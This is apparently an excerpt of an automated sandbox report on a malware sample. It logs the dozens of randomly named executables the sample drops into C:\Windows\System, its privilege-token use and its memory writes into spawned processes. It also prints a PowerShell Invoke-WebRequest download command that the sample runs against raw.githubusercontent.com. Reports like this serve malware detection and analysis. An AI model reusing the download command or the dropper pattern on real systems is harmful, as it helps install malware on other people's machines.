File created C:\Windows\System\XMDAKOY.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lzEEFmX.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dpnQrXq.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ysgisSC.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TnfSAVM.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rsPQEnm.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OKPFovj.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YmpKQFS.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EKcEJWd.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bKurmAe.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zxRnQww.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UGnRdFT.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WYUEpcV.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BSNsZhz.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WULZUUL.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nqSZujC.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GfVdrCO.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aVvbcVP.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lytWSvr.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zsqJcOT.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gaSkzGz.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wPnjkdG.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\drYFxFz.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dTwynIQ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aLeURkJ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\buuNAkS.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XXXMiyd.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NdyrwSR.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TafzEbR.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UBrWPSQ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WlWjdaT.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ChQEwrh.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xtQkjEJ.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SBgPlYm.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EXiBUkV.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GMFTrNE.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hfDMSyU.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qZQEsCd.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GbWEyWU.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WNXSyMe.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hLDhCym.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RJCRUly.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nZsolRY.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JvXrNDy.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qTDZABf.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GqpHySo.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rUPcuXr.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hBwkahs.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDZaSGz.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UxmAePM.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YrLPJkr.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pnfJbtm.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\daBmNAf.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wiLiaRq.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Ggwymth.exe C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4544 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4544 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4544 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\teqVxIM.exe
PID 4544 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\teqVxIM.exe
PID 4544 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\FeDaNNH.exe
PID 4544 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\FeDaNNH.exe
PID 4544 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ZimaJJH.exe
PID 4544 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ZimaJJH.exe
PID 4544 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ahORzoo.exe
PID 4544 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\ahORzoo.exe
PID 4544 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\GgXfWDf.exe
PID 4544 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\GgXfWDf.exe
PID 4544 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\bHbFzOx.exe
PID 4544 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\bHbFzOx.exe
PID 4544 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\pXmlHBd.exe
PID 4544 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\pXmlHBd.exe
PID 4544 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\cKJdSui.exe
PID 4544 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\cKJdSui.exe
PID 4544 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\xvSuGol.exe
PID 4544 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\xvSuGol.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\BSNsZhz.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\BSNsZhz.exe
PID 4544 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\liRTNAw.exe
PID 4544 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\liRTNAw.exe
PID 4544 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\eULUwQU.exe
PID 4544 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\eULUwQU.exe
PID 4544 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\LcOlCeq.exe
PID 4544 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\LcOlCeq.exe
PID 4544 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\IOihkbv.exe
PID 4544 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\IOihkbv.exe
PID 4544 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\NULohoJ.exe
PID 4544 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\NULohoJ.exe
PID 4544 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\NdyrwSR.exe
PID 4544 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\NdyrwSR.exe
PID 4544 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\NojuUMC.exe
PID 4544 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\NojuUMC.exe
PID 4544 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\wlnfQlw.exe
PID 4544 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\wlnfQlw.exe
PID 4544 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\nalNpft.exe
PID 4544 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\nalNpft.exe
PID 4544 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\iTjotIJ.exe
PID 4544 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\iTjotIJ.exe
PID 4544 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUxMdy.exe
PID 4544 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUxMdy.exe
PID 4544 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\pnfJbtm.exe
PID 4544 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\pnfJbtm.exe
PID 4544 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gfWGAiB.exe
PID 4544 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gfWGAiB.exe
PID 4544 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUGaOw.exe
PID 4544 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\WGUGaOw.exe
PID 4544 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\FspcJwC.exe
PID 4544 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\FspcJwC.exe
PID 4544 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\lqUyUzR.exe
PID 4544 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\lqUyUzR.exe
PID 4544 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\faffRMB.exe
PID 4544 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\faffRMB.exe
PID 4544 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\cnTGeLE.exe
PID 4544 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\cnTGeLE.exe
PID 4544 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\thYHXrT.exe
PID 4544 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\thYHXrT.exe
PID 4544 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YTDxbcK.exe
PID 4544 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\YTDxbcK.exe
PID 4544 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gBCVGiF.exe
PID 4544 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe C:\Windows\System\gBCVGiF.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7e056a20206d6cdd8bdf2c5e62790fa0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\teqVxIM.exe

C:\Windows\System\teqVxIM.exe

C:\Windows\System\FeDaNNH.exe

C:\Windows\System\FeDaNNH.exe

C:\Windows\System\ZimaJJH.exe

C:\Windows\System\ZimaJJH.exe

C:\Windows\System\ahORzoo.exe

C:\Windows\System\ahORzoo.exe

C:\Windows\System\GgXfWDf.exe

C:\Windows\System\GgXfWDf.exe

C:\Windows\System\bHbFzOx.exe

C:\Windows\System\bHbFzOx.exe

C:\Windows\System\pXmlHBd.exe

C:\Windows\System\pXmlHBd.exe

C:\Windows\System\cKJdSui.exe

C:\Windows\System\cKJdSui.exe

C:\Windows\System\xvSuGol.exe

C:\Windows\System\xvSuGol.exe

C:\Windows\System\BSNsZhz.exe

C:\Windows\System\BSNsZhz.exe

C:\Windows\System\liRTNAw.exe

C:\Windows\System\liRTNAw.exe

C:\Windows\System\eULUwQU.exe

C:\Windows\System\eULUwQU.exe

C:\Windows\System\LcOlCeq.exe

C:\Windows\System\LcOlCeq.exe

C:\Windows\System\IOihkbv.exe

C:\Windows\System\IOihkbv.exe

C:\Windows\System\NULohoJ.exe

C:\Windows\System\NULohoJ.exe

C:\Windows\System\NdyrwSR.exe

C:\Windows\System\NdyrwSR.exe

C:\Windows\System\NojuUMC.exe

C:\Windows\System\NojuUMC.exe

C:\Windows\System\wlnfQlw.exe

C:\Windows\System\wlnfQlw.exe

C:\Windows\System\nalNpft.exe

C:\Windows\System\nalNpft.exe

C:\Windows\System\iTjotIJ.exe

C:\Windows\System\iTjotIJ.exe

C:\Windows\System\WGUxMdy.exe

C:\Windows\System\WGUxMdy.exe

C:\Windows\System\pnfJbtm.exe

C:\Windows\System\pnfJbtm.exe

C:\Windows\System\gfWGAiB.exe

C:\Windows\System\gfWGAiB.exe

C:\Windows\System\WGUGaOw.exe

C:\Windows\System\WGUGaOw.exe

C:\Windows\System\FspcJwC.exe

C:\Windows\System\FspcJwC.exe

C:\Windows\System\lqUyUzR.exe

C:\Windows\System\lqUyUzR.exe

C:\Windows\System\faffRMB.exe

C:\Windows\System\faffRMB.exe

C:\Windows\System\cnTGeLE.exe

C:\Windows\System\cnTGeLE.exe

C:\Windows\System\thYHXrT.exe

C:\Windows\System\thYHXrT.exe

C:\Windows\System\YTDxbcK.exe

C:\Windows\System\YTDxbcK.exe

C:\Windows\System\gBCVGiF.exe

C:\Windows\System\gBCVGiF.exe

C:\Windows\System\XsIgUMG.exe

C:\Windows\System\XsIgUMG.exe

C:\Windows\System\yByFYJm.exe

C:\Windows\System\yByFYJm.exe

C:\Windows\System\UfFCnhm.exe

C:\Windows\System\UfFCnhm.exe

C:\Windows\System\dkaeTTv.exe

C:\Windows\System\dkaeTTv.exe

C:\Windows\System\ojYQXmD.exe

C:\Windows\System\ojYQXmD.exe

C:\Windows\System\wGMAqDU.exe

C:\Windows\System\wGMAqDU.exe

C:\Windows\System\zFCqHiH.exe

C:\Windows\System\zFCqHiH.exe

C:\Windows\System\YrLPJkr.exe

C:\Windows\System\YrLPJkr.exe

C:\Windows\System\RZwCOCD.exe

C:\Windows\System\RZwCOCD.exe

C:\Windows\System\HEKxjOL.exe

C:\Windows\System\HEKxjOL.exe

C:\Windows\System\zInjGgi.exe

C:\Windows\System\zInjGgi.exe

C:\Windows\System\wFWtVSm.exe

C:\Windows\System\wFWtVSm.exe

C:\Windows\System\MZflHfo.exe

C:\Windows\System\MZflHfo.exe

C:\Windows\System\fdhwhhK.exe

C:\Windows\System\fdhwhhK.exe

C:\Windows\System\WWnNoLm.exe

C:\Windows\System\WWnNoLm.exe

C:\Windows\System\HQCzDJt.exe

C:\Windows\System\HQCzDJt.exe

C:\Windows\System\lSnqTYA.exe

C:\Windows\System\lSnqTYA.exe

C:\Windows\System\rYjaoCP.exe

C:\Windows\System\rYjaoCP.exe

C:\Windows\System\drYFxFz.exe

C:\Windows\System\drYFxFz.exe

C:\Windows\System\SCoUOJn.exe

C:\Windows\System\SCoUOJn.exe

C:\Windows\System\bkWpJYz.exe

C:\Windows\System\bkWpJYz.exe

C:\Windows\System\EQMfZMt.exe

C:\Windows\System\EQMfZMt.exe

C:\Windows\System\rPqvdqN.exe

C:\Windows\System\rPqvdqN.exe

C:\Windows\System\QyxxaNM.exe

C:\Windows\System\QyxxaNM.exe

C:\Windows\System\CqRIxOl.exe

C:\Windows\System\CqRIxOl.exe

C:\Windows\System\xhRqJhD.exe

C:\Windows\System\xhRqJhD.exe

C:\Windows\System\xTsBXhZ.exe

C:\Windows\System\xTsBXhZ.exe

C:\Windows\System\hkmUUVJ.exe

C:\Windows\System\hkmUUVJ.exe

C:\Windows\System\ZQQKcFT.exe

C:\Windows\System\ZQQKcFT.exe

C:\Windows\System\lzEEFmX.exe

C:\Windows\System\lzEEFmX.exe

C:\Windows\System\aFfXEiy.exe

C:\Windows\System\aFfXEiy.exe

C:\Windows\System\JTZlyrn.exe

C:\Windows\System\JTZlyrn.exe

C:\Windows\System\gWwPYxz.exe

C:\Windows\System\gWwPYxz.exe

C:\Windows\System\wbafUFy.exe

C:\Windows\System\wbafUFy.exe

C:\Windows\System\NHdEoGG.exe

C:\Windows\System\NHdEoGG.exe

C:\Windows\System\nEPfnxR.exe

C:\Windows\System\nEPfnxR.exe

C:\Windows\System\HBryyKz.exe

C:\Windows\System\HBryyKz.exe

C:\Windows\System\PilIESO.exe

C:\Windows\System\PilIESO.exe

C:\Windows\System\MjGOWFi.exe

C:\Windows\System\MjGOWFi.exe

C:\Windows\System\cujqvXa.exe

C:\Windows\System\cujqvXa.exe

C:\Windows\System\nhiqupS.exe

C:\Windows\System\nhiqupS.exe

C:\Windows\System\CyAPfac.exe

C:\Windows\System\CyAPfac.exe

C:\Windows\System\jdSXqKY.exe

C:\Windows\System\jdSXqKY.exe

C:\Windows\System\LZvBzkx.exe

C:\Windows\System\LZvBzkx.exe

C:\Windows\System\rGnLjLF.exe

C:\Windows\System\rGnLjLF.exe

C:\Windows\System\SJQITAb.exe

C:\Windows\System\SJQITAb.exe

C:\Windows\System\yrKwMqX.exe

C:\Windows\System\yrKwMqX.exe

C:\Windows\System\kDkGFmn.exe

C:\Windows\System\kDkGFmn.exe

C:\Windows\System\pLzOSDe.exe

C:\Windows\System\pLzOSDe.exe

C:\Windows\System\daBmNAf.exe

C:\Windows\System\daBmNAf.exe

C:\Windows\System\WOvvucq.exe

C:\Windows\System\WOvvucq.exe

C:\Windows\System\yaLSzLI.exe

C:\Windows\System\yaLSzLI.exe

C:\Windows\System\wGAihHd.exe

C:\Windows\System\wGAihHd.exe

C:\Windows\System\RmuyFUv.exe

C:\Windows\System\RmuyFUv.exe

C:\Windows\System\sFEdYTY.exe

C:\Windows\System\sFEdYTY.exe

C:\Windows\System\DEpLnEx.exe

C:\Windows\System\DEpLnEx.exe

C:\Windows\System\rUPcuXr.exe

C:\Windows\System\rUPcuXr.exe

C:\Windows\System\BBBByzE.exe

C:\Windows\System\BBBByzE.exe

C:\Windows\System\SlsbhHx.exe

C:\Windows\System\SlsbhHx.exe

C:\Windows\System\hVoXnry.exe

C:\Windows\System\hVoXnry.exe

C:\Windows\System\MqOpJek.exe

